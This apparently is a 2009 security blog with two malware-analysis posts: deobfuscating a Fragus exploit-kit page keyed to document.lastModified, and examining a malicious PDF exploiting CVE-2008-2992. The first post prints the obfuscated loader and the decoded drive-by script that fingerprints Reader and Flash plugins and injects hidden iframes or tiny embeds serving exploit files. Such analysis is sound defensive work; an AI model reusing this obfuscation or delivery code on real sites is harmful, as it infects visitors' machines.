Sunday, November 15, 2009

Javascript lastmodified technique

Today I found a website that was reported to be hosting the Fragus botnet exploit kit.

After reviewing the page source code, it turned out to be using the ‘lastModified’ technique to make the deobfuscation process harder: the script derives part of its decoding key from document.lastModified (the seconds field of the page's Last-Modified date, prefixed with "97"), so it cannot be decoded offline without the real value the server sent. (Read here)

var jkmtu='',
uokyez=false,
jnuwx=String,
ehjnpy=jnuwx['f4r4o4mECPh4a9rPCLo4dLeL'.replace(/[LE49P]/g,'')],
btkz=window,
cflr=1,
bdfgou=btkz['eBvBajl0'.replace(/[0BGj2]/g,'')],
abhknx=document,
rwjzp=abhknx.lastModified,
chopqw=new Date(rwjzp).toUTCString(),
chopqw=chopqw.split(" "),
abmnxy=chopqw[4].split(":"),
acqtu="97"+abmnxy[2],
cmuwy=0,
...


By checking the HTTP response headers, we can obtain the Last-Modified date and substitute it into the variable for further analysis.
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 15 Nov 2009 18:00:39 GMT
Content-Type: text/html; charset=WINDOWS-1251
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 12 Dec 2008 11:11:35 GMT

Replace the variable with the Last-Modified value and edit the script so that the SpiderMonkey js interpreter prints the decoded output (window and document are stubbed to print, and the decoded string is passed to print instead of being evaluated):

window = print;
document = print;
var jkmtu='',
uokyez=false,
jnuwx=String,
ehjnpy=jnuwx['f4r4o4mECPh4a9rPCLo4dLeL'.replace(/[LE49P]/g,'')],
btkz=window,
cflr=1,
bdfgou=btkz['eBvBajl0'.replace(/[0BGj2]/g,'')],
abhknx=document,
rwjzp="Fri, 12 Dec 2008 11:11:35 GMT",
chopqw=new Date(rwjzp).toUTCString(),
chopqw=chopqw.split(" "),
abmnxy=chopqw[4].split(":"),
acqtu="97"+abmnxy[2],
cmuwy=0,
...
...
...
print(ajkq);
};

bcfknv();

Now we are ready to decode the JavaScript with the SpiderMonkey js interpreter. Below is the output:
/**
 * No-op stub present in the decoded script.
 * It takes no arguments, returns undefined and is not invoked anywhere in
 * the portion of the output reproduced here.
 */
function cfmqsy() {
  return undefined;
}

function jloqy(){
var ijqstv=false;
if(navigator.plugins && navigator.plugins.length){
for(var bfntv=0;bfntv < navigator.plugins.length;bfntv++){
if(navigator.plugins[bfntv].description.indexOf('Adobe Acrobat')!=-1){
ijqstv=true;
break;
}

if(navigator.plugins[bfntv].description.indexOf('Adobe PDF')!=-1){
ijqstv=true;
break;
}
}
}

else if(window.ActiveXObject){
var kyzvnb=null;

try{
kyzvnb=new ActiveXObject('AcroPDF.PDF');
} catch(e){}

if(!kyzvnb){
try{
kyzvnb=new ActiveXObject('PDF.PdfCtrl');
}
catch(e){}
}

if(kyzvnb){ijqstv=true;}
}

if(ijqstv){
var ua=navigator.userAgent.toLowerCase();
if(ua.indexOf("firefox")!=-1){
var fjwx=document.createElement('embed');
fjwx.width='1';
fjwx.height='1';
fjwx.src='./egilrw.pdf';
fjwx.type='application/pdf';
document.body.appendChild(fjwx);
}
else{
var fjwx=document.createElement('iframe');
fjwx.setAttribute('src','. < strong>/egilrw.pdf < /strong>');
fjwx.setAttribute('width',10);
fjwx.setAttribute('height',10);
fjwx.setAttribute('style','display:none;');
document.body.appendChild(fjwx);
}

...
...
...

function opvy(){
var PlayerVersion=[0,0,0];
if(navigator.plugins && navigator.mimeTypes.length){
var x=navigator.plugins["Shockwave Flash"];

if(x && x.description){
PlayerVersion=x.description.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split(".");
}
}

else{
try{
var fv=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
if(fv!=null){
PlayerVersion = fv.GetVariable("\$version").split(" ")[1].split(",");
}
} catch(e){abhmry();return;
}
}

var version1=PlayerVersion[0]!=null?parseInt(PlayerVersion[0]):0;
var version2=PlayerVersion[1]!=null?parseInt(PlayerVersion[1]):0;
var version3=PlayerVersion[2]!=null?parseInt(PlayerVersion[2]):0;

if(version1==9 && version3 < 124){
var ua=navigator.userAgent.toLowerCase();

if(ua.indexOf("firefox")!=-1){
var swfelement=document.createElement('embed');
document.body.appendChild(swfelement);
swfelement.width='1';
swfelement.height='1';
swfelement.src='. < strong>/manual.swf < /strong>';
swfelement.type='application/x-shockwave-flash';

...
...
...

}

// Entry point of the decoded script: the Adobe Reader plugin check in
// jloqy() runs as soon as this script executes in the page. opvy() (the
// Flash Player version check) is not invoked anywhere in the portion
// reproduced here.
jloqy();

From the code, we can see that it targets vulnerabilities in Adobe Reader (via the PDF) and Flash Player (via the SWF, only when a version 9 player older than 9.0.124 is detected), choosing the delivery element (embed or hidden iframe) from the plugin list, ActiveX objects and the user agent. (The ‘< strong>’ fragments in the listing appear to be blog formatting artifacts, not part of the script.)

Downloaded the malicious PDF file that they’ll push when a user visits the site. Gonna take a look at it later.

Saturday, November 14, 2009

Analyzing malicious PDF

Maybe some of you have read about malicious PDFs and the danger of neglecting the possibility that they can harm you in some way.

So today, let’s say you have caught a suspicious PDF file in the wild and you don’t really know what to do.



The first questions that arise are “Does it contain malicious content?” and, if yes, “What will it try to do, and how?”.
Now the first thing we normally do is look into the PDF’s content structure and check for any hints. A PDF file has a defined object structure. In this case, we’re going to use ‘cat’.



Alright, everything seems normal except the unreadable content between ‘stream’ and ‘endstream’. We cannot yet determine whether this unreadable content is malicious or just ordinary content for a PDF document. However, we know that it is encoded with FlateDecode, as we find by searching for the keyword ‘/Filter’. Most normal PDF files have some of their content encoded with FlateDecode, or with other encodings such as JBIG2Decode and DCTDecode. FlateDecode can usually be decoded with pdf-parser or an inflater.



It turns out that the decoded content is JavaScript code obfuscated with Base64 encoding. At this point the PDF file has drawn some attention, as it shows signs that the code might contain shellcode. Now we’ll dump the JavaScript snippet into a new text file for further analysis.

Next, we’ll use SpiderMonkey to interpret the JavaScript code and produce the shellcode as output.



Having come this far, we can be sure that this PDF contains malicious content, and we can also identify what it tries to do and how. From this shellcode, we can see that it tries to exploit the util.printf vulnerability (CVE-2008-2992) in Adobe Reader 8.1.2 and below. If it succeeds, it will execute the payload attached within the unescape() function.

Our next (and possibly last) point of attention is the payload itself. It is a UTF-16/UCS-2 encoded string which can be converted to hex or into a binary executable file. s2b.py can do that job.



From the hexdump output, we can see a URL pointing to potential malware that will be fetched once the exploitation succeeds; this URL is the indicator worth extracting for blocking and for hunting in proxy logs.